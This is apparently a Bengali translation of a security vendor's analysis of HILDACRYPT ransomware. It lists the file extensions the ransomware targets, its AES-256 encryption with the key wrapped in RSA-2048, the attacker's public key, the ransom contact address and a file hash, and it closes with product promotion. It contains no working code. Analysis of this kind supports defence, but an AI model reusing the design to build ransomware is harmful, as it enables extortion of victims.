āĻāĻ•ā§āϏāĻŸā§‡āύāĻļāύāϗ⧁āϞāĻŋāϰ āϤāĻžāϞāĻŋāĻ•āĻž āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰāĻž āĻšāϝāĻŧ:

ÂĢ.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.mdÂģ

āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āĻŦā§āϝāĻŦāĻšāĻžāϰāĻ•āĻžāϰ⧀āϰ āĻĢāĻžāχāϞ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāϤ⧇ AES-256-CBC āĻ…ā§āϝāĻžāϞāĻ—āϰāĻŋāĻĻāĻŽ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇āĨ¤ āϕ⧀ āϏāĻžāχāϜ āĻšāϞ 256 āĻŦāĻŋāϟ āĻāĻŦāĻ‚ āχāύāĻŋāĻļāĻŋāϝāĻŧāĻžāϞāĻžāχāĻœā§‡āĻļāύ āϭ⧇āĻ•ā§āϟāϰ (IV) āϏāĻžāχāϜ āĻšāϞ 16 āĻŦāĻžāχāϟāĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āύāĻŋāĻŽā§āύāϞāĻŋāĻ–āĻŋāϤ āĻ¸ā§āĻ•ā§āϰāĻŋāύāĻļāĻŸā§‡, byte_2 āĻāĻŦāĻ‚ byte_1 āĻāϰ āĻŽāĻžāύāϗ⧁āϞāĻŋ āĻāϞ⧋āĻŽā§‡āϞ⧋āĻ­āĻžāĻŦ⧇ GetBytes() āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻĒā§āϰāĻžāĻĒā§āϤ āĻ•āϰāĻž āĻšāϝāĻŧ⧇āϛ⧇āĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āϚāĻžāĻŦāĻŋ

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āϭ⧇āϤāϰ⧇ āĻāĻŦāĻ‚

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞ⧇āϰ āĻāĻ•ā§āϏāĻŸā§‡āύāĻļāύ HCY!.. āĻāϟāĻŋ āĻāĻ•āϟāĻŋ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞ⧇āϰ āωāĻĻāĻžāĻšāϰāĻŖāĨ¤ āωāĻĒāϰ⧇ āωāĻ˛ā§āϞāĻŋāĻ–āĻŋāϤ āϕ⧀ āĻāĻŦāĻ‚ IV āĻāχ āĻĢāĻžāχāϞ⧇āϰ āϜāĻ¨ā§āϝ āϤ⧈āϰāĻŋ āĻ•āϰāĻž āĻšāϝāĻŧ⧇āϛ⧇āĨ¤

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āϕ⧀ āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ

āĻ•ā§āϰāĻŋāĻĒā§āĻŸā§‹āϞ⧋āĻ•āĻžāϰ āĻāĻ•āϟāĻŋ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞ⧇ āĻœā§‡āύāĻžāϰ⧇āϟ āĻ•āϰāĻž AES āϕ⧀ āϏāĻ‚āϰāĻ•ā§āώāĻŖ āĻ•āϰ⧇āĨ¤ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞ⧇āϰ āĻĒā§āϰāĻĨāĻŽ āĻ…āĻ‚āĻļ⧇ āĻāĻ•āϟāĻŋ āĻļāĻŋāϰ⧋āύāĻžāĻŽ āϰāϝāĻŧ⧇āϛ⧇ āϝāĻžāϤ⧇ XML āĻĢāĻ°ā§āĻŽā§āϝāĻžāĻŸā§‡ HILDACRYPT, KEY, IV, FileLen-āĻāϰ āĻŽāϤ⧋ āĻĄā§‡āϟāĻž āϰāϝāĻŧ⧇āϛ⧇ āĻāĻŦāĻ‚ āĻāϟāĻŋ āĻĻ⧇āĻ–āϤ⧇ āĻāχāϰāĻ•āĻŽ:

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

AES āĻāĻŦāĻ‚ IV āϕ⧀ āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ RSA-2048 āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻ•āϰāĻž āĻšāϝāĻŧ āĻāĻŦāĻ‚ āĻŦ⧇āϏ64 āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ āĻāύāϕ⧋āĻĄāĻŋāĻ‚ āĻ•āϰāĻž āĻšāϝāĻŧāĨ¤ RSA āĻĒāĻžāĻŦāϞāĻŋāĻ• āϕ⧀ XML āĻĢāĻ°ā§āĻŽā§āϝāĻžāĻŸā§‡ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻ¸ā§āĻŸā§āϰāĻŋāĻ‚āϗ⧁āϞāĻŋāϰ āĻāĻ•āϟāĻŋāϤ⧇ āĻ•ā§āϰāĻŋāĻĒā§āϟāϞ⧋āĻ•āĻžāϰ⧇āϰ āĻŦāĻĄāĻŋāϤ⧇ āϏāĻ‚āϰāĻ•ā§āώāĻŋāϤ āĻĨāĻžāϕ⧇āĨ¤

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB

AES āĻĢāĻžāχāϞ āϕ⧀ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāϤ⧇ āĻāĻ•āϟāĻŋ RSA āĻĒāĻžāĻŦāϞāĻŋāĻ• āϕ⧀ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰāĻž āĻšāϝāĻŧāĨ¤ RSA āĻĒāĻžāĻŦāϞāĻŋāĻ• āϕ⧀ āĻšāϞ Base64 āĻāύāϕ⧋āĻĄ āĻ•āϰāĻž āĻāĻŦāĻ‚ āĻāϤ⧇ āĻāĻ•āϟāĻŋ āĻŽāĻĄā§āϞāĻžāϏ āĻāĻŦāĻ‚ 65537 āĻāϰ āĻāĻ•āϟāĻŋ āĻĒāĻžāĻŦāϞāĻŋāĻ• āĻāĻ•ā§āϏāĻĒā§‹āύ⧇āĻ¨ā§āϟ āϰāϝāĻŧ⧇āϛ⧇āĨ¤ āĻĄāĻŋāĻ•ā§āϰāĻŋāĻĒāĻļāύ⧇āϰ āϜāĻ¨ā§āϝ RSA āĻĒā§āϰāĻžāχāϭ⧇āϟ āϕ⧀ āĻĒā§āϰāϝāĻŧā§‹āϜāύ, āϝāĻž āφāĻ•ā§āϰāĻŽāĻŖāĻ•āĻžāϰ⧀āϰ āĻ•āĻžāϛ⧇ āφāϛ⧇āĨ¤

RSA āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ⧇āϰ āĻĒāϰ⧇, āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞ⧇ āϏāĻ‚āϰāĻ•ā§āώāĻŋāϤ Base64 āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇ AES āϕ⧀ āĻāύāϕ⧋āĻĄ āĻ•āϰāĻž āĻšāϝāĻŧāĨ¤

āĻŽā§āĻ•ā§āϤāĻŋāĻĒāĻŖ āĻŦāĻžāĻ°ā§āϤāĻž

āĻāĻ•āĻŦāĻžāϰ āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ āϏāĻŽā§āĻĒā§‚āĻ°ā§āĻŖ āĻšāϞ⧇, HILDACRYPT HTML āĻĢāĻžāχāϞāϟāĻŋāϕ⧇ āϏ⧇āχ āĻĢā§‹āĻ˛ā§āĻĄāĻžāϰ⧇ āϞ⧇āϖ⧇ āϝ⧇āĻ–āĻžāύ⧇ āĻāϟāĻŋ āĻĢāĻžāχāϞāϗ⧁āϞāĻŋāϕ⧇ āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰ⧇āϛ⧇āĨ¤ āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āĻŦāĻŋāĻœā§āĻžāĻĒā§āϤāĻŋāϤ⧇ āĻĻ⧁āϟāĻŋ āχāĻŽā§‡āϞ āĻ āĻŋāĻ•āĻžāύāĻž āϰāϝāĻŧ⧇āϛ⧇ āϝ⧇āĻ–āĻžāύ⧇ āĻļāĻŋāĻ•āĻžāϰ āφāĻ•ā§āϰāĻŽāĻŖāĻ•āĻžāϰ⧀āϰ āϏāĻžāĻĨ⧇ āϝ⧋āĻ—āĻžāϝ⧋āĻ— āĻ•āϰāϤ⧇ āĻĒāĻžāϰ⧇āĨ¤

  • āĻ…āύ⧁āϏāϰāĻŖ
    hildalolilovesyou@memeware.net

HILDACRYPT: āύāϤ⧁āύ ransomware āĻšāĻŋāϟ āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ

āϚāĻžāρāĻĻāĻžāĻŦāĻžāϜāĻŋāϰ āĻŦāĻŋāĻœā§āĻžāĻĒā§āϤāĻŋāϤ⧇ "āϕ⧋āύāĻ“ āϞāϞāĻŋ āύāĻŋāϰāĻžāĻĒāĻĻ āύāϝāĻŧ;)" āϞāĻžāχāύ āϰāϝāĻŧ⧇āϛ⧇ - āϜāĻžāĻĒāĻžāύ⧇ āύāĻŋāώāĻŋāĻĻā§āϧ āϛ⧋āϟ āĻŽā§‡āϝāĻŧ⧇āĻĻ⧇āϰ āĻšā§‡āĻšāĻžāϰāĻž āϏāĻš āĻ…ā§āϝāĻžāύāĻŋāĻŽā§‡ āĻāĻŦāĻ‚ āĻŽāĻžāĻ™ā§āĻ—āĻž āϚāϰāĻŋāĻ¤ā§āϰāϗ⧁āϞāĻŋāϰ āĻāĻ•āϟāĻŋ āωāĻ˛ā§āϞ⧇āĻ–āĨ¤

āωāĻĒāϏāĻ‚āĻšāĻžāϰ

HILDACRYPT, āĻāĻ•āϟāĻŋ āύāϤ⧁āύ ransomware āĻĒāϰāĻŋāĻŦāĻžāϰ, āĻāĻ•āϟāĻŋ āύāϤ⧁āύ āϏāĻ‚āĻ¸ā§āĻ•āϰāĻŖ āĻĒā§āϰāĻ•āĻžāĻļ āĻ•āϰ⧇āϛ⧇⧎ āĻāύāĻ•ā§āϰāĻŋāĻĒāĻļāύ āĻŽāĻĄā§‡āϞ āĻ­āĻŋāĻ•āϟāĻŋāĻŽāϕ⧇ āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ āĻĻā§āĻŦāĻžāϰāĻž āĻāύāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāĻž āĻĢāĻžāχāϞāϗ⧁āϞāĻŋāϕ⧇ āĻĄāĻŋāĻ•ā§āϰāĻŋāĻĒā§āϟ āĻ•āϰāϤ⧇ āĻŦāĻžāϧāĻž āĻĻ⧇āϝāĻŧāĨ¤ Cryptolocker āĻŦā§āϝāĻžāĻ•āφāĻĒ āϏāĻŋāĻ¸ā§āĻŸā§‡āĻŽ āĻāĻŦāĻ‚ āĻ…ā§āϝāĻžāĻ¨ā§āϟāĻŋāĻ­āĻžāχāϰāĻžāϏ āϏāĻŽāĻžāϧāĻžāύ āϏāĻŽā§āĻĒāĻ°ā§āĻ•āĻŋāϤ āϏ⧁āϰāĻ•ā§āώāĻž āĻĒāϰāĻŋāώ⧇āĻŦāĻžāϗ⧁āϞāĻŋ āĻ…āĻ•ā§āώāĻŽ āĻ•āϰāϤ⧇ āϏāĻ•ā§āϰāĻŋāϝāĻŧ āϏ⧁āϰāĻ•ā§āώāĻž āĻĒāĻĻā§āϧāϤāĻŋ āĻŦā§āϝāĻŦāĻšāĻžāϰ āĻ•āϰ⧇āĨ¤ HILDACRYPT-āĻāϰ āϞ⧇āĻ–āĻ• Netflix-āĻ āĻĻ⧇āĻ–āĻžāύ⧋ āĻ…ā§āϝāĻžāύāĻŋāĻŽā§‡āĻŸā§‡āĻĄ āϏāĻŋāϰāĻŋāϜ Hilda-āĻāϰ āĻāĻ•āϜāύ āĻ­āĻ•ā§āϤ, āϝ⧇āϟāĻŋāϰ āĻŸā§āϰ⧇āϞāĻžāϰ⧇āϰ āϞāĻŋāĻ™ā§āĻ•āϟāĻŋ āĻĒā§āϰ⧋āĻ—ā§āϰāĻžāĻŽā§‡āϰ āĻĒā§‚āĻ°ā§āĻŦāĻŦāĻ°ā§āϤ⧀ āϏāĻ‚āĻ¸ā§āĻ•āϰāϪ⧇āϰ āϜāĻ¨ā§āϝ āĻŦāĻžāχāφāωāϟ āϞ⧇āϟāĻžāϰ⧇ āĻ›āĻŋāϞāĨ¤

āϏāĻžāϧāĻžāϰāĻŖāϤ, āĻ…ā§āϝāĻžāĻ•ā§āϰ⧋āύāĻŋāϏ āĻŦā§āϝāĻžāĻ•āφāĻĒ Đ¸ Acronis āϏāĻ¤ā§āϝ āϚāĻŋāĻ¤ā§āϰ āφāĻĒāύāĻžāϰ āĻ•āĻŽā§āĻĒāĻŋāωāϟāĻžāϰāϕ⧇ HILDACRYPT ransomware āĻĨ⧇āϕ⧇ āϰāĻ•ā§āώāĻž āĻ•āϰāϤ⧇ āĻĒāĻžāϰ⧇ āĻāĻŦāĻ‚ āĻĒā§āϰāĻĻāĻžāύāĻ•āĻžāϰ⧀āĻĻ⧇āϰ āϤāĻžāĻĻ⧇āϰ āĻ—ā§āϰāĻžāĻšāĻ•āĻĻ⧇āϰ āϰāĻ•ā§āώāĻž āĻ•āϰāĻžāϰ āĻ•ā§āώāĻŽāϤāĻž āϰāϝāĻŧ⧇āϛ⧇ āĻ…ā§āϝāĻžāĻ•ā§āϰ⧋āύāĻŋāϏ āĻŦā§āϝāĻžāĻ•āφāĻĒ āĻ•ā§āϞāĻžāωāĻĄ. āϏ⧁āϰāĻ•ā§āώāĻž āύāĻŋāĻļā§āϚāĻŋāϤ āĻ•āϰāĻž āĻšāϝāĻŧ āϝ⧇ āĻāχ āϏāĻŽāĻžāϧāĻžāύāϗ⧁āϞāĻŋ āĻ…āĻ¨ā§āϤāĻ°ā§āϭ⧁āĻ•ā§āϤ āĻ•āϰ⧇ āϏāĻžāχāĻŦāĻžāϰ āύāĻŋāϰāĻžāĻĒāĻ¤ā§āϤāĻž āĻļ⧁āϧ⧁āĻŽāĻžāĻ¤ā§āϰ āĻŦā§āϝāĻžāĻ•āφāĻĒ āύāϝāĻŧ, āφāĻŽāĻžāĻĻ⧇āϰ āϏāĻŽāĻ¨ā§āĻŦāĻŋāϤ āύāĻŋāϰāĻžāĻĒāĻ¤ā§āϤāĻž āĻŦā§āϝāĻŦāĻ¸ā§āĻĨāĻžāĻ“ āĻ…āĻ¨ā§āϤāĻ°ā§āϭ⧁āĻ•ā§āϤ āĻ…ā§āϝāĻžāĻ•ā§āϰ⧋āύāĻŋāϏ āϏāĻ•ā§āϰāĻŋāϝāĻŧ āϏ⧁āϰāĻ•ā§āώāĻž - āĻāĻ•āϟāĻŋ āĻŽā§‡āĻļāĻŋāύ āϞāĻžāĻ°ā§āύāĻŋāĻ‚ āĻŽāĻĄā§‡āϞ āĻĻā§āĻŦāĻžāϰāĻž āϚāĻžāϞāĻŋāϤ āĻāĻŦāĻ‚ āφāϚāϰāĻŖāĻ—āϤ āĻšāĻŋāωāϰāĻŋāĻ¸ā§āϟāĻŋāĻ•āϏ⧇āϰ āωāĻĒāϰ āĻ­āĻŋāĻ¤ā§āϤāĻŋ āĻ•āϰ⧇, āĻāĻŽāύ āĻāĻ•āϟāĻŋ āĻĒā§āϰāϝ⧁āĻ•ā§āϤāĻŋ āϝāĻž āĻļā§‚āĻ¨ā§āϝ-āĻĻāĻŋāύ⧇āϰ āĻ°ā§āϝāĻžāύāϏāĻŽāĻ“āϝāĻŧā§āϝāĻžāϰ⧇āϰ āĻšā§āĻŽāĻ•āĻŋ āĻŽā§‹āĻ•āĻžāĻŦ⧇āϞāĻž āĻ•āϰāϤ⧇ āϏāĻ•ā§āώāĻŽāĨ¤

āϏāĻŽāĻā§‹āϤāĻžāϰ āύāĻŋāĻ°ā§āĻĻ⧇āĻļāĻ•

āĻĢāĻžāχāϞ āĻāĻ•ā§āϏāĻŸā§‡āύāĻļāύ HCY!
HILDACRYPReadMe.html
xamp.exe āĻāĻ•āϟāĻŋ āĻ…āĻ•ā§āώāϰ "p" āϏāĻš āĻāĻŦāĻ‚ āϕ⧋āύ āĻĄāĻŋāϜāĻŋāϟāĻžāϞ āĻ¸ā§āĻŦāĻžāĻ•ā§āώāϰ āύ⧇āχ
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

āωāĻ¤ā§āϏ: www.habr.com

DDoS āϏ⧁āϰāĻ•ā§āώāĻž, VPS VDS āϏāĻžāĻ°ā§āĻ­āĻžāϰ āϏāĻš āϏāĻžāχāϟāϗ⧁āϞāĻŋāϰ āϜāĻ¨ā§āϝ āύāĻŋāĻ°ā§āĻ­āϰāϝ⧋āĻ—ā§āϝ āĻšā§‹āĻ¸ā§āϟāĻŋāĻ‚ āĻ•āĻŋāύ⧁āύ đŸ”Ĩ DDoS āϏ⧁āϰāĻ•ā§āώāĻž āϏāĻš āύāĻŋāĻ°ā§āĻ­āϰāϝ⧋āĻ—ā§āϝ āĻ“āϝāĻŧ⧇āĻŦāϏāĻžāχāϟ āĻšā§‹āĻ¸ā§āϟāĻŋāĻ‚ āĻ•āĻŋāύ⧁āύ, VPS VDS āϏāĻžāĻ°ā§āĻ­āĻžāϰ | ProHoster